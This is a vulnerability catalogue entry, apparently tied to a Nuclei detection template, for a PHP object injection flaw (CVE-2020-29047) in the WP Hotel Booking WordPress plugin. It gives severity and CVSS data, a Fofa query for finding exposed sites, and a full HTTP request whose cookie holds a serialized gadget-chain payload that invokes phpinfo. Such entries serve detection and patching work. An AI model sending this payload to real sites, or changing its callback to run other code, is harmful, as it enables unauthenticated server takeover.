| Title | WP Hotel Booking < 1.10.4 - PHP Object Injection |
|---|---|
| Author | DhiyaneshDk |
| Severity | Critical |
| Impact | Unauthenticated attackers can exploit PHP object injection to execute arbitrary code, leading to complete server compromise. |
| Remediation | Upgrade to WP Hotel Booking version 1.10.3 or later. |
| CVSS Score | 9.8 |
| EPSS Score | 0.8462 |
| CVE ID | CVE-2020-29047 |
| CWE ID | CWE-502 |
| Fofa Query | body="wp-content/plugins/wp-hotel-booking" |
| Tags | cve cve2020 wordpress wp-plugin wp wp-hotel-booking rce thimpress vkev vuln |
The wp-hotel-booking plugin through 1.10.2 for WordPress allows remote attackers to execute arbitrary code because of an unserialize operation on the thimpress_hotel_booking_1 cookie in load in includes/class-wphb-sessions.php.
GET / HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:138.0) Gecko/20100101 Firefox/138.0
Connection: close
Cookie: thimpress_hotel_booking_1=O:11:"WPHB_Logger":1:{s:21:"%00WPHB_Logger%00_handles"%3BC:33:"Requests_Utility_FilteredIterator":67:{x:i:0%3Ba:1:{i:0%3Bs:2:"-1"%3B}%3Bm:a:1:{s:11:"%00*%00callback"%3Bs:7:"phpinfo"%3B}}}
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-29047.yaml
🦈 Packet Capture: ⬇️ Download cve-2020-29047.pcap
N/AN/A